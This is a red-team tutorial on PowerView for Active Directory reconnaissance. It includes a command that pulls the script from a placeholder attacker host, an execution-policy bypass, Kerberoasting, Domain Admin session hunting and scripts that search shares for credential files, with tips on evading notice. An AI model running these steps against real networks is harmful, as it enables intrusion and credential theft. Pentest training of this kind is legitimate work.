PowerView
What is PowerView?
PowerView is a PowerShell-based tool for gaining network situational awareness on Windows domains.
It acts as a PowerShell replacement for the net* commands (net user, net group, net view, ...) and uses .NET DirectoryServices (ADSI/LDAP) queries together with underlying Win32 API functions (NetSessionEnum, NetWkstaUserEnum, NetShareEnum, ...) to interact with Active Directory, so it does not need the RSAT ActiveDirectory module on the host.
It is well suited to reconnaissance and privilege escalation during red team engagements. PowerView 3.0 renamed most functions from Get-Net* to Get-Domain* and kept the old names as aliases, which is why both forms appear below.
Setup
Download PowerView (the PowerSploit repository; the dev branch carries the most recent version)
mkdir /opt/ADtools
cd /opt/ADtools
wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1
Host PowerView with Python's built-in HTTP server (serves the current directory on port 8000 by default)
python3 -m http.server
Transfer PowerView to the target machine (replace the URL with your listener; this writes the script to disk)
powershell (New-Object System.Net.WebClient).DownloadFile('http://<attacker-ip>:8000/PowerView.ps1','PowerView.ps1')
Execution policy bypass (-nop skips the profile, -ep bypass ignores the execution policy for this process; the policy is a safety setting, not a security boundary)
powershell -nop -ep bypass
Import PowerView
To load all PowerView functions into the current session:
Import-Module .\PowerView.ps1
or dot-source the script, which defines its functions in the current scope:
. .\PowerView.ps1
Running the file as a plain script (.\PowerView.ps1) is not enough: it executes in a child scope and the functions disappear as soon as it returns.
Active Directory Enumeration
Domain Enumeration
Get domain info (current domain, or a specific one with -Domain)
Get-Domain
Get-NetDomain
Get-Domain -Domain infosecwarrior.local
Get domain SID
Get-DomainSID
Get domain controllers:
Get-DomainController
Get-NetDomainController
User Enumeration
List all users
Get-NetUser
Get a short list of users (common name only):
Get-NetUser | select cn
Get user principal names:
Get-NetUser | select userprincipalname
Get specific user details (PowerView 2.x syntax; the -Identity form below is the 3.0 equivalent)
Get-NetUser -UserName DevNull
Get a list of users in the current domain (Get-DomainUser is the 3.0 name, Get-NetUser its alias)
Get-DomainUser
Get-DomainUser -Identity DevNull
Get-DomainUser | select samaccountname
Get-DomainUser | select samaccountname,logonCount
Get all properties of one user, or only selected properties for every user
Get-DomainUser -Identity DevNull -Properties *
Get-DomainUser -Properties samaccountname,logonCount
Search for a string in a user attribute with an LDAP filter (PowerView ANDs it with its own user filter, so keep the parentheses)
Get-DomainUser -LDAPFilter "(description=*built*)" | Select name,description
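The single-attribute lookups above become useful when combined into one sweep. The following is an added example, not code from the original page or from the PowerView project: it uses PowerView 3.0's Get-DomainUser with the LDAP bitwise matching rule to pull the user-account weaknesses a pentester checks first (no-password-required, reversible encryption, non-expiring passwords, no Kerberos pre-auth), then SPN accounts and passwords left in descriptions. The domain is the page's infosecwarrior.local; the output path is an assumption.

```powershell
# Added example, not part of the original page or of PowerView itself.
# Assumes PowerView 3.0 is dot-sourced; $Domain is the page's lab domain, $Out is an assumed path.
$Domain = 'infosecwarrior.local'
$Out    = "$env:TEMP\user-sweep.csv"

# userAccountControl flag bits, tested server-side with the LDAP bitwise-AND matching rule
# (1.2.840.113556.1.4.803); PowerView ANDs the filter with its own (samAccountType=805306368).
$UacChecks = @{
    PASSWD_NOTREQD        = 0x0020     # blank password allowed regardless of domain policy
    ENCRYPTED_TEXT_PWD    = 0x0080     # reversible encryption, cleartext recoverable from the DC
    DONT_EXPIRE_PASSWORD  = 0x10000    # password never rotates
    DONT_REQ_PREAUTH      = 0x400000   # AS-REP roastable without any credentials
}

$Findings = New-Object System.Collections.Generic.List[object]

foreach ($Check in $UacChecks.Keys) {
    $Filter = "(userAccountControl:1.2.840.113556.1.4.803:=$($UacChecks[$Check]))"
    Get-DomainUser -Domain $Domain -LDAPFilter $Filter -Properties samaccountname,pwdlastset,lastlogontimestamp,description |
        ForEach-Object {
            $Findings.Add([pscustomobject]@{
                Finding        = $Check
                SamAccountName = $_.samaccountname
                PwdLastSet     = $_.pwdlastset          # PowerView converts FILETIME values to DateTime
                LastLogon      = $_.lastlogontimestamp
                Detail         = $_.description
            })
        }
}

# Accounts with an SPN are Kerberoast candidates; the SPN list doubles as a service inventory
Get-DomainUser -Domain $Domain -SPN -Properties samaccountname,serviceprincipalname,pwdlastset |
    ForEach-Object {
        $Findings.Add([pscustomobject]@{
            Finding        = 'HAS_SPN'
            SamAccountName = $_.samaccountname
            PwdLastSet     = $_.pwdlastset
            LastLogon      = $null
            Detail         = ($_.serviceprincipalname -join '; ')
        })
    }

# Passwords and hints left in the description attribute, readable by every domain user
Get-DomainUser -Domain $Domain -LDAPFilter '(description=*)' -Properties samaccountname,description |
    Where-Object { $_.description -match 'pass|pwd|cred|temp' } |
    ForEach-Object {
        $Findings.Add([pscustomobject]@{
            Finding        = 'DESCRIPTION_HINT'
            SamAccountName = $_.samaccountname
            PwdLastSet     = $null
            LastLogon      = $null
            Detail         = $_.description
        })
    }

$Findings | Sort-Object Finding, SamAccountName | Format-Table -AutoSize
$Findings | Export-Csv -NoTypeInformation -Path $Out
```

Doing the flag tests in the LDAP filter keeps the work on the domain controller and avoids depending on how PowerView renders userAccountControl locally; the same matching-rule filter works with any LDAP client.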
Group Enumeration
List all groups
Get-NetGroup
Get-NetGroup -Domain infosecwarrior.local
Groups with adminCount=1 (protected by AdminSDHolder, i.e. privileged groups)
Get-NetGroup -AdminCount
List group members
Get-DomainGroupMember "Domain Admins"
Get group members (PowerView 2.x syntax)
Get-NetGroupMember -GroupName "administrators"
List local groups on a machine
Get-NetLocalGroup -ComputerName WC01
Get members of a specific local group ("Administrators") on a machine
Get-NetLocalGroupMember -ComputerName WC01 -GroupName Administrators
Get domain groups and membership
Get-DomainGroup
Get-DomainGroup -Domain infosecwarrior.local
Get-DomainGroup *admin* | select Name
Get-DomainGroup *admin* -Domain infosecwarrior.local | select Name
Get all members of the "Domain Admins" group, expanding nested groups
Get-DomainGroupMember -Identity "Domain Admins" -Recurse
Equivalent with the ActiveDirectory module cmdlet (requires RSAT)
Get-ADGroupMember -Identity "Domain Admins" -Recursive
Get the group membership for a specific user
Get-DomainGroup -UserName "DevNull"
Equivalent with the ActiveDirectory module cmdlet
Get-ADPrincipalGroupMembership -Identity DevNull
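Recursive membership and -AdminCount answer two different questions, and comparing them is where the findings are. This is an added example, not from the original page or from PowerView: it expands a list of high-value groups with Get-DomainGroupMember -Recurse, de-duplicates the effective users, and then lists accounts that still carry adminCount=1 without being in any of those groups. The group list is an assumption (the usual built-in protected groups); the domain is the page's.

```powershell
# Added example, not part of the original page or of PowerView itself.
# Assumes PowerView 3.0 is loaded; $HighValue is an assumed list of groups worth tracking.
$Domain    = 'infosecwarrior.local'
$HighValue = 'Domain Admins','Enterprise Admins','Schema Admins','Administrators',
             'Account Operators','Backup Operators','Server Operators','Print Operators',
             'DnsAdmins','Group Policy Creator Owners'

$Privileged = @{}   # samaccountname -> groups that grant the privilege (directly or nested)
foreach ($Group in $HighValue) {
    # -Recurse walks nested groups; MemberObjectClass separates users from groups and computers
    Get-DomainGroupMember -Identity $Group -Domain $Domain -Recurse -ErrorAction SilentlyContinue |
        Where-Object { $_.MemberObjectClass -eq 'user' -and $_.MemberName } |
        ForEach-Object {
            if (-not $Privileged.ContainsKey($_.MemberName)) { $Privileged[$_.MemberName] = @() }
            $Privileged[$_.MemberName] += $Group
        }
}

"Effective privileged users:"
$Privileged.GetEnumerator() | Sort-Object Name | ForEach-Object {
    '{0,-25} via {1}' -f $_.Name, (($_.Value | Sort-Object -Unique) -join ', ')
}

# SDProp sets adminCount=1 when an account joins a protected group and never clears it.
# Accounts that left such a group keep the hardened ACL (no inheritance) and still show up
# under -AdminCount; krbtgt is expected here, anything else deserves a look.
$Orphans = Get-DomainUser -Domain $Domain -AdminCount -Properties samaccountname |
    Where-Object { -not $Privileged.ContainsKey($_.samaccountname) } |
    Select-Object -ExpandProperty samaccountname

"adminCount=1 but not in any high-value group:"
$Orphans
```

On the offensive side the first list is the target set for session hunting; on the defensive side the second list is cleanup work (clear adminCount and re-enable inheritance once the account is confirmed non-privileged).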
Computer Enumeration
List all computers
Get-NetComputer
Get-NetComputer -Ping
Get-NetComputer | select cn, operatingsystem
Get a list of all computers in the current domain
Get-DomainComputer | select Name
Get-DomainComputer | select dnshostname
Get-DomainComputer | select dnshostname, logonCount
Get-DomainComputer | select Name, dnshostname, logonCount
Get the DNS host names only, as plain strings (handy for piping into other commands)
Get-DomainComputer | select -ExpandProperty dnshostname
Get computers running a specific OS (LDAP wildcard match on the operatingSystem attribute)
Get-DomainComputer -OperatingSystem "*Server 2022*"
Ping all discovered computers and return only the ones that respond (touches every host, so it is noisy)
Get-DomainComputer -Ping
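The computer listing is more useful once it is grouped and filtered before any host is touched. This is an added example, not from the original page or from PowerView: it builds an OS inventory, separates stale objects by lastLogonTimestamp, flags non-DC hosts trusted for unconstrained delegation, and only then pings the hosts that are still worth the traffic. The 90-day staleness window is an assumption.

```powershell
# Added example, not part of the original page or of PowerView itself.
# Assumes PowerView 3.0 is loaded; the 90-day window is an assumed staleness threshold.
$Domain = 'infosecwarrior.local'
$Stale  = (Get-Date).AddDays(-90)

$Computers = Get-DomainComputer -Domain $Domain -Properties dnshostname,operatingsystem,operatingsystemversion,lastlogontimestamp

# 1. What is out there, grouped by OS: unsupported versions stand out immediately
$Computers | Group-Object operatingsystem | Sort-Object Count -Descending |
    Select-Object Count, Name | Format-Table -AutoSize

# 2. Objects with no logon in 90 days (or no timestamp at all): probably decommissioned,
#    but the accounts still exist and still waste time in later -Ping sweeps
$Computers | Where-Object { $_.lastlogontimestamp -lt $Stale } |
    Select-Object dnshostname, lastlogontimestamp

# 3. Unconstrained delegation: the host caches a TGT of every user who authenticates to it,
#    so compromising it yields those users. DCs are expected; any other host is a finding.
$DCs = Get-DomainController -Domain $Domain | Select-Object -ExpandProperty Name
Get-DomainComputer -Domain $Domain -Unconstrained -Properties dnshostname |
    Where-Object { $DCs -notcontains $_.dnshostname } |
    Select-Object -ExpandProperty dnshostname

# 4. Only now spend network traffic: live hosts among the current (non-stale) set.
#    This is what -Ping does, restricted to hosts that are likely to answer.
$Computers | Where-Object { $_.lastlogontimestamp -ge $Stale } |
    Select-Object -ExpandProperty dnshostname |
    ForEach-Object { if (Test-Connection -ComputerName $_ -Count 1 -Quiet) { $_ } }
```

lastLogonTimestamp is replicated with a lag of up to 14 days, so treat the staleness cut as coarse; lastLogon is exact but is per-DC and needs a query against every DC.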
Advanced Group and GPO Enumeration
List the GPOs of a specific domain
Get-DomainGPO -Domain infosecwarrior.local
Get domain policies (Get-DomainPolicy is an alias of Get-DomainPolicyData; -Policy Domain reads the Default Domain Policy, -Policy DC the Default Domain Controllers Policy)
Get-DomainPolicy
Get-DomainPolicyData -Policy Domain
Get-DomainPolicyData -Policy DC
Session and Logon Enumeration
Find machines on which the current user has local admin rights
Find-LocalAdminAccess
Get logged-on users (Get-NetLoggedOn calls NetWkstaUserEnum and needs admin on the target; Get-LastLoggedOn and Get-LoggedOnLocal read the remote registry; Get-NetRDPSession lists RDP sessions)
Get-NetLoggedOn -ComputerName DC01.infosecwarrior.local
Get-LastLoggedOn -ComputerName DC01.infosecwarrior.local
Get-NetRDPSession -ComputerName DC01.infosecwarrior.local
Get-LoggedOnLocal -ComputerName WC01
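The reason to enumerate admin access and sessions is to find a host you control where a privileged user is logged on. PowerView ships Find-DomainUserLocation (alias Invoke-UserHunter) for exactly that; the following added example, not from the original page or from PowerView, spells out the combination of calls it makes so the logic is visible: take the recursive Domain Admins membership as the target set, restrict to hosts where Find-LocalAdminAccess succeeds, and check both NetWkstaUserEnum logons and NetSessionEnum SMB sessions there. The domain is the page's.

```powershell
# Added example, not part of the original page or of PowerView itself.
# Assumes PowerView 3.0 is loaded and the current token is a domain user.
$Domain = 'infosecwarrior.local'

# Target set: every user that is, directly or through nesting, a Domain Admin
$Targets = Get-DomainGroupMember -Identity 'Domain Admins' -Domain $Domain -Recurse |
    Where-Object { $_.MemberObjectClass -eq 'user' } |
    Select-Object -ExpandProperty MemberName

# Hosts where the current user is local admin (PowerView opens the remote Service Control
# Manager with full access to test this). Only these are worth querying with admin-only APIs.
$AdminHosts = @(Find-LocalAdminAccess -Domain $Domain)

$Hits = foreach ($Computer in $AdminHosts) {
    # NetWkstaUserEnum: interactive and service logons on the box (admin required)
    $LoggedOn = Get-NetLoggedon -ComputerName $Computer -ErrorAction SilentlyContinue |
        Select-Object -ExpandProperty UserName
    # NetSessionEnum: SMB sessions; CName is the client address, i.e. where the user really sits
    $Sessions = Get-NetSession -ComputerName $Computer -ErrorAction SilentlyContinue

    foreach ($User in $LoggedOn) {
        if ($Targets -contains $User) {
            [pscustomobject]@{ Computer = $Computer; User = $User; Source = 'LoggedOn'; From = $null }
        }
    }
    foreach ($S in $Sessions) {
        if ($Targets -contains $S.UserName) {
            [pscustomobject]@{ Computer = $Computer; User = $S.UserName; Source = 'Session'; From = $S.CName }
        }
    }
}

$Hits | Sort-Object User, Computer | Format-Table -AutoSize
```

A 'LoggedOn' hit on a host you administer means the user's credentials are in LSASS there; a 'Session' hit points to the client machine in From, which may itself be a better place to look. On current Windows versions NetSessionEnum is restricted to administrators, which is why the admin check comes first.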
Network Share and File Discovery
Find shares on hosts in the current domain (Invoke-ShareFinder is an alias of Find-DomainShare in PowerView 3.0)
Invoke-ShareFinder -Verbose
Find sensitive files on computers in the domain (alias of Find-InterestingDomainShareFile)
Invoke-FileFinder -Verbose
Get all file servers of the domain (servers referenced by users' homeDirectory, scriptPath and profilePath attributes)
Get-NetFileServer
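Both share commands above enumerate every host and every share, which is slow and loud. This added example, not from the original page or from PowerView, narrows the hunt: Find-DomainShare with access checking and the standard admin shares excluded, then Find-InterestingFile (the per-path worker behind Invoke-FileFinder) over just the readable shares with an assumed pattern list aimed at credential material. The output path is an assumption.

```powershell
# Added example, not part of the original page or of PowerView itself.
# Assumes PowerView 3.0 is loaded; $Patterns and $Out are assumptions.
$Domain = 'infosecwarrior.local'
$Out    = "$env:TEMP\interesting-files.csv"

# -CheckShareAccess keeps only shares the current user can list; the -Exclude* switches drop
# C$/ADMIN$ style admin shares, IPC$ and printer shares, which never hold files anyway.
$Shares = @(Find-DomainShare -Domain $Domain -CheckShareAccess -ExcludeStandard -ExcludePrint -ExcludeIPC)
$Shares | Select-Object ComputerName, Name, Remark | Format-Table -AutoSize

# File-name patterns that usually carry secrets; -Include replaces PowerView's default list.
$Patterns = '*pass*','*cred*','*.kdbx','*.pfx','*.p12','*.ppk','*id_rsa*','*unattend*.xml',
            '*sysprep*','*.config','*.rdp','*.ps1','*.bat'

$Hits = foreach ($Share in $Shares) {
    $Path = "\\$($Share.ComputerName)\$($Share.Name)"
    Find-InterestingFile -Path $Path -Include $Patterns -ExcludeHidden -ErrorAction SilentlyContinue
}

# Recently modified files first: those are the ones still in use
$Hits | Sort-Object LastWriteTime -Descending |
    Select-Object FullName, Owner, Length, LastWriteTime | Format-Table -AutoSize
$Hits | Export-Csv -NoTypeInformation -Path $Out
```

Walking a large share tree still generates a burst of SMB traffic from one host; spread it with the -Delay and -Jitter parameters of Find-DomainShare when blending in matters.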
Attack Techniques
Kerberoasting
Request TGS tickets for user accounts that have a Service Principal Name (SPN) and extract them in a format John the Ripper or hashcat can crack offline:
Invoke-Kerberoast
Admin Privilege Hunting
Enumerate the members of the local Administrators group on every machine in the domain (unlike Find-LocalAdminAccess, which tests where the current user is admin)
Invoke-EnumerateLocalAdmin
Network Share Discovery
Identify network shares (the same command as in the share section above; it is the usual first step before hunting files on shares)
Invoke-ShareFinder